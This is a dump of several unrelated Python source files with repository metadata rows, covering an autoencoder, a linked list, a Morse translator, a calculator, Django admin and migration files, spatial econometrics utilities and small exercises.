# ------------------------------------------------------------------------------
class AETanH(nn.Module):
def __name__(self):
return 'AE'
# ------------------------------------------------------------------------------
def __init__(self, cfg):
super(AETanH, self).__init__()
assert cfg.GENE_EMBED_DIM < 12
self.nc = cfg.N_CHANNELS
self.w = cfg.IMG_SIZE
self.input_dim = cfg.N_GENES
self.encoder = nn.Sequential(
nn.Linear(self.input_dim, 128),
nn.Tanh(),
nn.Linear(128, 64),
nn.Tanh(),
nn.Linear(64, cfg.GENE_EMBED_DIM)
)
self.decoder = nn.Sequential(
nn.Linear(cfg.GENE_EMBED_DIM, 64),
nn.Tanh(),
nn.Linear(64, 128),
nn.Tanh(),
nn.Linear(128, self.input_dim)
)
# ------------------------------------------------------------------------------
def encode(self, x):
x = x.view(-1, np.prod(x.shape[1:]))
return self.encoder(x)
# ------------------------------------------------------------------------------
def decode(self, z):
x = self.decoder(z)
return x.view(-1, self.input_dim)
# ------------------------------------------------------------------------------
def forward(self, x):
x = self.encode(x)
x = self.decode(x)
return x
|
[
"ggundersen@gmail.com"
] |
ggundersen@gmail.com
|
5824f026706f22fed9333ce3b0f3cdc2674fb5cf
|
afb7d4d6013b6a9022d707d5835a3dd578214b2e
|
/Bite_172.py
|
d38f7db655c51e87afd6b54e249df6347f9a2efa
|
[] |
no_license
|
JB0925/Bites
|
86f0bd49d8b53376257c14df280ae0a9643139a2
|
f884ce4ffd7ce39afcea5b86a80cec14c607a4f0
|
refs/heads/master
| 2023-03-29T21:48:42.849729
| 2021-03-29T01:37:48
| 2021-03-29T01:37:48
| 316,419,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from functools import partial
# create 2 partials:
# - 'rounder_int' rounds to int (0 places)
# - 'rounder_detailed' rounds to 4 places
rounder_int = 0
rounder_detailed = 0
def round_to_int(num, places):
return round(num, places)
rounder_int = partial(round_to_int, places=0)
rounder_detailed = partial(round_to_int, places=4)
print(rounder_detailed(10.4232567))
|
[
"jbrink0925@gmail.com"
] |
jbrink0925@gmail.com
|
32c853e551c807d8e0690e5eef0d6d8be54c3e94
|
da6bf15899bff60785b4659277a94c043c669f8f
|
/morse.py
|
198d3b555f073e1525d3fc5bef7806a92a91b463
|
[] |
no_license
|
sandraonne/Python2
|
97aabe49b16043e3420dda1f49a18680b7268b01
|
7a07a02282afa1bb14390edf9082ee7da7200c6e
|
refs/heads/master
| 2021-01-24T00:33:29.414648
| 2018-02-24T19:02:40
| 2018-02-24T19:02:40
| 122,771,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
# Koosta programm, mis programmi käivitamisel tervitab
# kasutajat nii tavakeeles kui morse koodina, lubab
# seejärel kasutajal sisestada sõnu ning teisendab need
# sümbolhaaval morsetähestikku (lisades iga sümboli järele
# tühiku). Sõnastik ei pruugi sisaldada kõikvõimalikke
# märke, seega tuleb iga sümboli puhul kontrollida, kas
# see üldse esineb sõnastikus. kontrollimiseks kasutame
# ainult väikesed tähed. Samuti õ. ä. ü ja ö asemel kasutame o, a ja u.
tahestik = {"a":".-", "b":"-...", "c":"-.-.", "d":"-..", "e":".", "f":"..-.", "g":"--.", "h":"....", "i":"..",
"j":".---", "k":"-.-", "l":".-..", "m":"--", "n":"-.", "o":"---", "p":".--.", "q":"--.-", "r":".-.",
"s":"...", "t":"-", "u":"..-", "v":"...-", "w":".--", "x":"-..-", "y":"-.--", "z":"--..", " ":".......",
"ä":".-", "õ":"---", "ö":"---", "ü":"..-"}
tervitus = "Tervist"
print("Tervist")
for taht in tervitus:
for voti in tahestik:
if (taht.lower() == voti):
print(tahestik[voti])
sona = input("Sisesta sõna või lause: ")
for taht in sona:
for voti in tahestik:
if (taht.lower() == voti):
print(tahestik[voti])
# else:
# print("Sellist sümbolit ei esine morsetähestikus")
|
[
"sandra.onne@khk.ee"
] |
sandra.onne@khk.ee
|
daaced6e4d0072db31cb545558da38494a427fbc
|
93d995cd40ff724570d904956564f5be00f2fbb7
|
/class_code/Tuesday/singly_linked_list.py
|
cd80d4481a1ca27165765fbf02938b47e380aa89
|
[] |
no_license
|
HKang42/Data-Structures
|
fe37f9b3388bb65c91e44617eb57c8e5ecea21be
|
0df5d658a9b752ba7e113ec60a7666739066eda1
|
refs/heads/master
| 2022-11-08T19:25:31.359372
| 2020-06-12T06:57:44
| 2020-06-12T06:57:44
| 271,117,643
| 0
| 0
| null | 2020-06-09T21:54:26
| 2020-06-09T21:54:26
| null |
UTF-8
|
Python
| false
| false
| 5,068
|
py
|
class Node:
def __init__(self, value, next=None):
self.value = value
self.next_node = next
def get_value(self):
# returns the node's data
return self.value
def get_next(self):
# returns the thing pointed at by this node's `next` reference
return self.next_node
def set_next(self, new_next):
# sets this node's `next` reference to `new_next`
self.next_node = new_next
class LinkedList:
def __init__(self):
# the first Node in the LinkedList
self.head = None
# the last Node in the LinkedList
self.tail = None
'''
Adds `data` to the end of the LinkedList
O(1) because this operation doesn't depend on the size of the linked list
'''
def add_to_tail(self, data):
# wrap the `data` in a Node instance
new_node = Node(data)
# what about the empty case, when both self.head = None and self.tail = None?
if not self.head and not self.tail:
# list is empty
# update both head and tail to point to the new node
self.head = new_node
self.tail = new_node
# non-empty linked list case
else:
# call set_next with the new_node on the current tail node
self.tail.set_next(new_node)
# update self.tail to point to the new last Node in the linked list
self.tail = new_node
'''
Removes the Node that `self.tail` is referring to and returns the
Node's data
What's the runtime of this method?
'''
def remove_tail(self):
# if the linked list is empty
if self.tail is None:
return None
# save the tail Node's data
data = self.tail.get_value()
# both head and tail refer to the same Node
# there's only one Node in the linked list
if self.head is self.tail:
# set both to be None
self.head = None
self.tail = None
else:
# in order to update `self.tail` to point to the
# the Node _before_ the tail, we need to traverse
# the whole linked list starting from the head,
# because we cannot move backwards from any one
# Node, so we have to start from the beginning
current = self.head
# traverse until we get to the Node right
# before the tail Node
while current.get_next() != self.tail:
current = current.get_next()
# `current` is now pointing at the Node right
# before the tail Node
self.tail = None
self.tail = current
# self.tail.set_next(None)
return data
'''
Removes the Node that `self.head` is referring to and returns the
Node's data
'''
def remove_head(self):
if self.head is None:
return None
# save the head Node's data
data = self.head.get_value()
# both head and tail refer to the same Node
# there's only one Node in the linked list
if self.head is self.tail:
# set both to be None
self.head = None
self.tail = None
else:
# we have more than one Node in the linked list
# delete the head Node
# update `self.head` to refer to the Node after the Node we just deleted
self.head = self.head.get_next()
return data
'''
Traverses the linked list and returns a boolean indicating whether the
specified `data` is in the linked list.
What's the runtime for this method?
'''
def contains(self, data):
# an empty linked list can't contain what we're looking for
if not self.head:
return False
# get a reference to the first Node in the linked list
# we update what this Node points to as we traverse the linked list
current = self.head
# traverse the linked list so long as `current` is referring
# to a Node
while current is not None:
# check if the Node that `current` is pointing at is holding
# the data we're looking for
if current.get_value() == data:
return True
# update our `current` pointer to point to the next Node in the linked list
current = current.get_next()
# we checked the whole linked list and didn't find the data
return False
'''
Traverses the linked list, fetching the max value in the linked list
What is the runtime of this method?
'''
def get_max(self):
if self.head is None:
return None
max_so_far = self.head.get_value()
current = self.head.get_next()
while current is not None:
if current.get_value() > max_so_far:
max_so_far = current.get_value()
current = current.get_next()
return max_so_far
|
[
"h.kang.q@gmail.com"
] |
h.kang.q@gmail.com
|
12d8dc00bbdec801fde535c2fb1573d4d8be79cc
|
d8d43bfb5ac50e88bf26ef59c9b3881b3d9686c6
|
/codecamp_project/campsessions/migrations/0004_auto__add_time__chg_field_session_time__add_index_session_time.py
|
b58f51a27c6f0b4ba8824297d6a03433b78bf199
|
[] |
no_license
|
harmstyler/codecamp_project
|
929e48feae87c423c2670a46cf952bfb86117f15
|
8f367737d67b739fb1b11d9d214fbd910ccc5dfa
|
refs/heads/master
| 2021-01-19T13:50:39.470072
| 2013-08-04T20:46:36
| 2013-08-04T20:46:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,108
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Time'
db.create_table(u'campsessions_time', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('time', self.gf('django.db.models.fields.TimeField')()),
))
db.send_create_signal(u'campsessions', ['Time'])
# Renaming column for 'Session.time' to match new field type.
db.rename_column(u'campsessions_session', 'time', 'time_id')
# Changing field 'Session.time'
db.alter_column(u'campsessions_session', 'time_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['campsessions.Time'], null=True))
# Adding index on 'Session', fields ['time']
db.create_index(u'campsessions_session', ['time_id'])
def backwards(self, orm):
# Removing index on 'Session', fields ['time']
db.delete_index(u'campsessions_session', ['time_id'])
# Deleting model 'Time'
db.delete_table(u'campsessions_time')
# Renaming column for 'Session.time' to match new field type.
db.rename_column(u'campsessions_session', 'time_id', 'time')
# Changing field 'Session.time'
db.alter_column(u'campsessions_session', 'time', self.gf('django.db.models.fields.TimeField')(default=0))
models = {
u'campsessions.room': {
'Meta': {'ordering': "['name']", 'object_name': 'Room'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'campsessions.session': {
'Meta': {'ordering': "['title']", 'object_name': 'Session'},
'abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campsessions.Room']", 'null': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'speakers': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['speakers.Speaker']", 'symmetrical': 'False'}),
'time': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campsessions.Time']", 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
u'campsessions.time': {
'Meta': {'ordering': "['time']", 'object_name': 'Time'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {})
},
u'speakers.speaker': {
'Meta': {'ordering': "['last_name']", 'object_name': 'Speaker'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['campsessions']
|
[
"tyler.harms@gmail.com"
] |
tyler.harms@gmail.com
|
c48fcc8440c694ee49e258c7188c7d92ea4424b6
|
b367dfbc07fdfcc55d1d43839646c8b91eb18b2f
|
/simple calculater - Copy.py
|
f7f823e9521620e6c148401980e45404c32040c3
|
[] |
no_license
|
manpreetSingh1308/Python-programs
|
cd5c6baf7fd2662c0cad68a89dc9990e91ca0c79
|
fb012c41fcbe011533eaa51886d986272376e9f6
|
refs/heads/main
| 2023-08-19T23:45:52.080045
| 2021-10-30T20:07:24
| 2021-10-30T20:07:24
| 422,979,639
| 0
| 0
| null | 2021-10-30T20:04:49
| 2021-10-30T20:04:49
| null |
UTF-8
|
Python
| false
| false
| 1,400
|
py
|
# Program make a simple calculator
# This function adds two numbers
def add(x, y):
return x + y
# This function subtracts two numbers
def subtract(x, y):
return x - y
# This function multiplies two numbers
def multiply(x, y):
return x * y
# This function divides two numbers
def divide(x, y):
return x / y
print("Select operation.")
print("1.Add")
print("2.Subtract")
print("3.Multiply")
print("4.Divide")
while True:
# take input from the user
choice = input("Enter choice(1/2/3/4): ")
# check if choice is one of the four options
if choice in ('1', '2', '3', '4'):
num1 = float(input("Enter first number: "))
num2 = float(input("Enter second number: "))
if choice == '1':
print(num1, "+", num2, "=", add(num1, num2))
elif choice == '2':
print(num1, "-", num2, "=", subtract(num1, num2))
elif choice == '3':
print(num1, "*", num2, "=", multiply(num1, num2))
elif choice == '4':
print(num1, "/", num2, "=", divide(num1, num2))
# check if user wants another calculation
# break the while loop if answer is no
next_calculation = input("Let's do next calculation? (yes/no): ")
if next_calculation == "no":
break
else:
print("Invalid Input")
|
[
"noreply@github.com"
] |
manpreetSingh1308.noreply@github.com
|
617d16ab2f1dfad658507e965879e41e4d3c041c
|
7aefd6394563a7418fec84f87a7b22ba2e1b00e9
|
/build/lib/hetsar/utils.py
|
48508f90b21c245e5019dd0c3c3c9d7eb6c04619
|
[
"BSD-3-Clause"
] |
permissive
|
ida-j/hetsar
|
817d8f779eaefe40a34824945b743f7596049460
|
198b18c9f27d6e8be94f688eb2bd404a50ac2824
|
refs/heads/main
| 2023-06-07T23:10:44.782865
| 2021-06-21T16:15:01
| 2021-06-21T16:15:01
| 332,352,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,972
|
py
|
import numpy as np
import pandas as pd
def fn_significance_stars(zscore):
if np.abs(zscore)>=2.58:
return '***'
elif np.abs(zscore)<2.58 and np.abs(zscore)>=1.96:
return '**'
elif np.abs(zscore)<1.96 and np.abs(zscore)>=1.65:
return '*'
else:
return ''
def fn_add_lags(df,idvar,timevar,varlist,lagorders):
"""
:param df:
:param idvar:
:param timevar:
:param varlist:
:param lagorders:
:return:
"""
dfl = df.set_index([idvar,timevar])
for lag in lagorders:
df_lagged = dfl.groupby(level = [0])[varlist].shift(lag).reset_index().\
rename(columns = {'y':f'y_l{lag}','x':f'x_l{lag}'})
df = df.merge(df_lagged, on = [idvar,timevar]).dropna()
return df.reset_index(drop = True)
def fn_inv_partitioned_a(invA,m_B,m_C,m_D):
m_C_invA = m_C@invA
m_E = m_D - m_C_invA@m_B
invE = np.linalg.inv(m_E)
m_invA_B_invE = invA@m_B@invE
invH11 = invA + (m_invA_B_invE @ m_C_invA);
invH12 = -m_invA_B_invE;
invH21 = -invE @ m_C_invA;
invH22 = invE;
row1 = np.concatenate((invH11, invH12),axis = 1)
row2 = np.concatenate((invH21, invH22),axis = 1)
invH = np.concatenate((row1,row2),axis = 0)
return invH
def fn_inv_partitioned_b(m_A,m_B,m_C,invD):
m_B_invD = m_B @ invD;
m_F = m_A - (m_B_invD @ m_C);
invF = np.linalg.inv(m_F);
m_invD_C_invF = invD @ m_C @ invF;
invH11 = invF;
invH12 = -invF @ m_B_invD;
invH21 = -m_invD_C_invF;
invH22 = invD + (m_invD_C_invF @ m_B_invD);
row1 = np.concatenate((invH11, invH12),axis = 1)
row2 = np.concatenate((invH21, invH22),axis = 1)
invH = np.concatenate((row1,row2),axis = 0)
return invH
def fn_varml_sandwich_Npsi_NKbeta_Nsgmsq(v_theta,m_y,m_ys,a_x,m_W):
N,T,K = a_x.shape
v_psi = v_theta[:N,0].reshape(N,1)
v_beta = v_theta[N:(N+K*N),0].reshape(N*K,1)
v_sgmsq = v_theta[(N+K*N):,0].reshape(N,1)
# m_beta = v_beta.reshape([N,K], order = 'F')
m_beta = v_beta.reshape([N,K], order = 'C')
v_sgm4h = v_sgmsq**2
v_sgm6h = v_sgmsq**3
a_x2 = np.transpose(a_x,(0,2,1))
m_beta2 = m_beta[:,:,np.newaxis]
m_beta_x = m_beta2*a_x2
m_beta_x2 = np.transpose(m_beta_x,(0,2,1))
m_beta_x_sum = np.sum(m_beta_x2,2)
# residuals
m_eps = m_y-v_psi*m_ys-m_beta_x_sum
m_epssq = m_eps**2
v_ssr = np.sum(m_eps**2,1).reshape(N,1)
sssr = np.sum(v_ssr/v_sgmsq)
m_Psi = v_psi * np.identity(len(v_psi))
m_A = np.identity(N)-m_Psi@m_W
det_mA= np.linalg.det(m_A)
if det_mA<=0:
print('Error: determinant(A)<=0!')
m_Q = m_W@np.linalg.inv(m_A)
m_H11 = m_Q*np.transpose(m_Q) + np.diag(np.sum(m_ys**2,1))/(T*v_sgmsq)
m_H13a = np.sum(m_ys*m_eps,1).reshape(N,1)/(T*v_sgm4h)
m_H13 = m_H13a*np.identity(len(m_H13a))
m_H33a = -(0.5/v_sgm4h)+(v_ssr/v_sgm6h)/T
m_H33 = m_H33a*np.identity(len(m_H33a))
m_H12 = np.zeros([N,N*K])
invH22 = np.zeros([N*K,N*K])
m_H23 = np.zeros([N*K,N])
for i in range(N):
ind = (i * K + 1,(i+1) * K)
v_ysi = m_ys[i,:].reshape(T,1)
m_Xi = a_x[i,:,:] # TxK
v_epsi = m_eps[i,:].reshape(T,1)
sgmsqi = v_sgmsq[i,0]
sgm4hi = v_sgm4h[i,0]
m_H12[i,ind[0]-1:ind[1]] = np.transpose(v_ysi)@m_Xi/sgmsqi/T
invH22[ind[0]-1:ind[1],ind[0]-1:ind[1]] = np.linalg.inv(np.transpose(m_Xi)@m_Xi)*sgmsqi*T
m_H23[ind[0]-1:ind[1],i] = np.transpose(np.transpose(m_Xi)@v_epsi/sgm4hi/T)
m_Z11 = m_H11;
m_Z12 = np.concatenate((m_H12,m_H13),axis = 1)
invZ22 = fn_inv_partitioned_a(invH22,m_H23,np.transpose(m_H23),m_H33)
invH = fn_inv_partitioned_b(m_Z11, m_Z12, np.transpose(m_Z12), invZ22)
# J matrix
v_q = np.diag(m_Q).reshape(N,1)
m_dlogft_dvpsi = (m_ys*m_eps/v_sgmsq) - v_q
v_dlogft_dvsgmsq = (m_epssq/v_sgm4h/2) - 0.5/v_sgmsq
a_dlogft_dvbeta = m_eps.reshape(N,T,1)*a_x/v_sgmsq.reshape(N,1,1)
m_dlogft_dvbeta = np.zeros([K*N,T])
for i in range(N):
ind = (i * K + 1,(i+1) * K)
m_dlogft_dvbeta[ind[0]-1:ind[1],:] = np.transpose(a_dlogft_dvbeta[i,:,:])
m_dlogft_dvtheta = np.concatenate((m_dlogft_dvpsi,m_dlogft_dvbeta,v_dlogft_dvsgmsq))
m_J = (m_dlogft_dvtheta@np.transpose(m_dlogft_dvtheta))/T
# standard variance
v_var0 = np.diag(invH)/T
v_var = v_var0.reshape(len(v_var0),1)
m_variance = np.zeros([N,K+2])
for i in [0,K+1]:
m_variance[:,i] = v_var[i*N:(i+1)*N,0]
for k_val in range(K):
i = 1
m_variance[:,i+k_val] = v_var[[j+k_val for j in range(i*N+i-1,(i+K)*N+i-1,K)],0]
# sandwich variance
m_invH_J_invH = invH@m_J@invH
v_var0 = np.diag(m_invH_J_invH)/T
v_var = v_var0.reshape(len(v_var0),1)
m_sandwich = np.zeros([N,K+2])
for i in [0,K+1]:
m_sandwich[:,i] = v_var[i*N:(i+1)*N,0]
for k_val in range(K):
i = 1
m_sandwich[:,i+k_val] = v_var[[j+k_val for j in range(i*N+i-1,(i+K)*N+i-1,K)],0]
return (m_variance,m_sandwich)
def format_output(res,N,T,K,var,var_sand,dep_var,exog_labels,id_var):
res_psi = res.x[:N].reshape([N,1])
res_beta = res.x[N:(K+1)*N].reshape([N,K],order = 'C')
res_sigma = res.x[(K+1)*N:].reshape([N,1])
data_r = np.concatenate([res_psi,res_beta,res_sigma],axis = 1)
dim_exog = res_beta.shape[1]
if exog_labels==None:
exog_labels = ['x{}'.format(i) for i in range(dim_exog)]
else:
if len(exog_labels)!=dim_exog:
print('Wrong number of labels for exogenous covariates, using default labels')
exog_labels = ['x{}'.format(i) for i in range(dim_exog)]
colnames = [f'W{dep_var}'] + exog_labels + ['sgmsq']
df_r = pd.DataFrame(data=data_r,columns = colnames)
for i in range(len(colnames)):
df_r['var_{}'.format(colnames[i])] = var[:,i]
df_r['var_sandw_{}'.format(colnames[i])] = var_sand[:,i]
df_r.insert(0, id_var, [i for i in range(1,N+1)])
return df_r
# mean-group estimator
def fn_mg_est(df_theta,var_hat,group):
countN = df_theta[[group,var_hat]].groupby(group).count().reset_index().rename(columns = {var_hat:'N'})
df_mg = df_theta[[var_hat,group]].groupby(group).mean().reset_index().rename(columns = {var_hat:'var_hat_mg'})
df_est2 = df_theta[[var_hat,group]].merge(df_mg[[group,'var_hat_mg']],on = group,how = 'left').\
rename(columns = {var_hat:'var_hat'})
df_est2['sq_er'] = (df_est2.var_hat-df_est2.var_hat_mg)**2
df_sgm = df_est2[[group,'sq_er']].groupby(group).sum().reset_index().\
merge(countN,on = group)
df_sgm['s_{}_mg'.format(var_hat)] = np.sqrt(df_sgm.sq_er/(df_sgm.N*(df_sgm.N-1)))
return df_sgm.merge(df_mg[['var_hat_mg',group]],on = group).\
rename(columns = {'var_hat_mg':'{}_mg'.format(var_hat)})[[group,'s_{}_mg'.format(var_hat),'{}_mg'.format(var_hat)]]
def fn_mg_bias_rmse_size(df_results,var_hat,var0,N,cval = 1.96):
df_est = df_results[[var_hat,'r','N']].rename(columns = {var_hat:'var_hat'})
df_est['var0'] = var0
res_mean = df_est[['var_hat','var0','r']].groupby('r').mean().reset_index()
res_mean['bias'] = res_mean['var_hat']-res_mean['var0']
res_mean = res_mean.rename(columns = {'var_hat':'var_hat_mg'})
res_mean['rmse'] = (res_mean['var_hat_mg']-res_mean['var0'])**2
bias_r = res_mean.mean().bias
rmse_r = (res_mean.mean().rmse)**(1/2)
df_est2 = df_est.merge(res_mean[['r','var_hat_mg']],on = 'r',how = 'left')
df_est2['sq_er'] = (df_est2.var_hat-df_est2.var_hat_mg)**2
df_sgm = df_est2[['r','sq_er']].groupby('r').sum().reset_index()
df_sgm['s2_r'] = df_sgm.sq_er/(N*(N-1))
df_sgm['s'] = np.sqrt(df_sgm.s2_r)
df_sgm2 = df_sgm.merge(res_mean[['r','var_hat_mg']],on = 'r',how = 'left')
df_sgm2['var0'] = var0
df_sgm2['t']= (df_sgm2.var_hat_mg-df_sgm2.var0)/df_sgm2.s
df_sgm2['size'] = 1*(np.abs(df_sgm2.t)>cval)
size_r = df_sgm2.mean()['size']
return (bias_r,rmse_r,size_r)
|
[
"ida.b.johnsson@gmail.com"
] |
ida.b.johnsson@gmail.com
|
1471e72b37bcd808725dc8eefdf97b634cc957dc
|
34bfac68474bea25a02adfb255ec817a080207ad
|
/code/test.py
|
b52cbd6071a9f998cf258ef7dad6aaf9808f137f
|
[
"Unlicense"
] |
permissive
|
telavivmakers/geek_code
|
574d3aec793ba1688b53b3c4b4ee8ed7c1ee20bc
|
a4fce2dc0d569c72bfa820c7c7a8d95097818ca2
|
refs/heads/master
| 2023-02-23T04:41:38.580022
| 2023-02-18T18:33:12
| 2023-02-18T18:33:12
| 216,117,542
| 29
| 4
|
Unlicense
| 2023-02-18T18:33:13
| 2019-10-18T22:44:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
import geek_decode
meaning,remaining = geek_decode.parse_geekcode(' GS blabla GDS')
print(meaning, remaining)
|
[
"noreply@github.com"
] |
telavivmakers.noreply@github.com
|
a0d18993b6906afca87c3392a769e58c0dd83185
|
24f9f3ce945c84d6afe32870e320a1d5c9d896ac
|
/Week2/Code/dictionary.py
|
605830369ca42ea1462fd5787dd45982740e75ba
|
[] |
no_license
|
acse-yq3018/CMEECourseWork
|
64c529db506a65e43cfc656726d66769b60742cd
|
8f2ae373f21f39d72780e64d74f27db1ae3c9c43
|
refs/heads/master
| 2021-10-22T11:33:40.573899
| 2019-03-10T11:50:16
| 2019-03-10T11:50:16
| 151,982,957
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
#!/usr/bin/env python3
"""Use dictionary to classify taxa"""
__appname__ = 'dictionary.py'
__author__ = 'Yuxin Qin (yq3018@imperial.ac.uk)'
__version__ = '0.0.1'
##################################################
taxa = [ ('Myotis lucifugus','Chiroptera'),
('Gerbillus henleyi','Rodentia',),
('Peromyscus crinitus', 'Rodentia'),
('Mus domesticus', 'Rodentia'),
('Cleithrionomys rutilus', 'Rodentia'),
('Microgale dobsoni', 'Afrosoricida'),
('Microgale talazaci', 'Afrosoricida'),
('Lyacon pictus', 'Carnivora'),
('Arctocephalus gazella', 'Carnivora'),
('Canis lupus', 'Carnivora'),
]
# Write a short python script to populate a dictionary called taxa_dic
# derived from taxa so that it maps order names to sets of taxa.
# E.g. 'Chiroptera' : set(['Myotis lucifugus']) etc.
# ANNOTATE WHAT EVERY BLOCK OR IF NECESSARY, LINE IS DOING!
# ALSO, PLEASE INCLUDE A DOCSTRING AT THE BEGINNING OF THIS FILE THAT
# SAYS WHAT THE SCRIPT DOES AND WHO THE AUTHOR IS
# Write your script here:
taxa_dic = {}
for i, k in taxa:
s = taxa_dic.get(k) or set () # taxa_dic(k) return a value of k
s.add (i)
taxa_dic[k] = s
print (taxa_dic)
|
[
"yq3018@imperial.ac.uk"
] |
yq3018@imperial.ac.uk
|
85fc832f7949d2a610125186d9650db344d63852
|
2743b52bf0fbc7ffb3d90298c6a47bc95c097baf
|
/py2/fractal_tree_v1.1.py
|
a26eceed27b4af2709fc3e565a2214920f377887
|
[] |
no_license
|
ArvinShaffer/anaconda
|
6d1c4e41dae1436e8dc3df607322d25bb0f27221
|
8ab61c73493a1986253d0c77818beede5bb3be0f
|
refs/heads/master
| 2023-02-17T19:17:57.351454
| 2023-02-15T11:53:58
| 2023-02-15T11:53:58
| 119,800,579
| 2
| 0
| null | 2023-02-15T11:53:59
| 2018-02-01T07:36:20
|
Python
|
UTF-8
|
Python
| false
| false
| 800
|
py
|
"""
Author:Arvin Shaffer
Function:Draw a five-pointed star!
Version:1.1
Date:02/15/2018
1.1 New Function:Use iteration function draw Fractal tree
"""
import turtle
def draw_recursive_Fractal(size):
"""
Use iteration to draw a Fractal tree
:param size:
:return:
"""
if size > 5:
turtle.forward(size)
turtle.right(20)
draw_recursive_Fractal(size - 10)
turtle.left(40)
draw_recursive_Fractal(size - 10)
turtle.right(20)
turtle.backward(size)
def initial_brush():
turtle.pencolor('red')
turtle.penup()
turtle.sety(-100)
turtle.pendown()
turtle.left(90)
def main():
initial_brush()
draw_recursive_Fractal(66)
turtle.exitonclick()
if __name__ == "__main__" :
main()
|
[
"jianzhimo@sina.cn"
] |
jianzhimo@sina.cn
|
ba655956928273bdb83c374d24470b7db1bd2652
|
daa05742d81f4bb5b0385682f89eed89a97f08d2
|
/vproj/library/admin.py
|
1fff9e395bcd052b07fd45aa88308ae93372b2d1
|
[] |
no_license
|
meetakshiaggarwal/lib-proj-vib
|
b923083a973326d3ab0d56007b4bde77577bb3a0
|
505f6a6471b61365e137aed003a3938c971cca29
|
refs/heads/master
| 2021-01-10T08:08:12.417942
| 2015-11-25T16:03:33
| 2015-11-25T16:03:33
| 46,871,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
from django.contrib import admin
# Register your models here.
from .forms import CategoryForm
from .forms import AuthorForm
from .forms import PublisherForm
from .forms import BookForm
from .forms import HasCategoryForm
from .forms import CompiledByForm
from .forms import MemberForm
from .forms import BookCopyForm
from .forms import HistoryForm
from .forms import WaitingListForm
from .models import Category
from .models import Author
from .models import Publisher
from .models import Book
from .models import HasCategory
from .models import CompiledBy
from .models import Member
from .models import BookCopy
from .models import History
from .models import WaitingList
class CategoryAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "category_id"]
form = CategoryForm
class AuthorAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "author_id"]
form = AuthorForm
class PublisherAdmin(admin.ModelAdmin):
list_display = ["__unicode__", "publisher_id"]
form = PublisherForm
class BookAdmin(admin.ModelAdmin):
list_display = ["book_id","__unicode__", "isbn_no","rating", "no_of_copies"]
form = BookForm
class HasCategoryAdmin(admin.ModelAdmin):
list_display = ["__unicode__"]
form = HasCategoryForm
class CompiledByAdmin(admin.ModelAdmin):
list_display = ["book_id","author_id","publisher_id"]
form = CompiledByForm
class MemberAdmin(admin.ModelAdmin):
# list_display = ["first_name","last_name","phone","email","date_of_joining","reference_id"]
form = MemberForm
class BookCopyAdmin(admin.ModelAdmin):
form = BookCopyForm
class HistoryAdmin(admin.ModelAdmin):
form = HistoryForm
class WaitingListAdmin(admin.ModelAdmin):
form = WaitingListForm
# admin.site.register(SignUp,SignUpAdmin)
admin.site.register(Category,CategoryAdmin)
admin.site.register(Author, AuthorAdmin)
admin.site.register(Publisher,PublisherAdmin)
admin.site.register(Book,BookAdmin)
admin.site.register(HasCategory,HasCategoryAdmin)
admin.site.register(CompiledBy,CompiledByAdmin)
admin.site.register(Member, MemberAdmin)
admin.site.register(BookCopy,BookCopyAdmin)
admin.site.register(History,HistoryAdmin)
admin.site.register(WaitingList,WaitingListAdmin)
|
[
"meetakshi17@gmail.com"
] |
meetakshi17@gmail.com
|
111111693155ec12ab89d1259913c5984ac0ba31
|
42fe73b2ef271565c60f633af1be8344d7966350
|
/JD_spider/fit.py
|
652589ab787aeac9e577d5902c8720004bb995b9
|
[] |
no_license
|
ElecEyeCk/EEC
|
ce475f988d2c7a0391d89749a301760664c4c41f
|
8d3a6734abf953a40b9792f8420b5799e649e7b4
|
refs/heads/master
| 2023-08-05T23:41:09.681636
| 2021-09-27T04:53:20
| 2021-09-27T04:53:20
| 382,285,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
import pandas as pd
import csv
file_path = "C:/Users/王羽钧/Desktop/大三下/软件工程课设/数据集/7-6/JD_Phone6.csv"
csv_file = pd.read_csv(file_path)
commit_list = csv_file['commit'].copy()
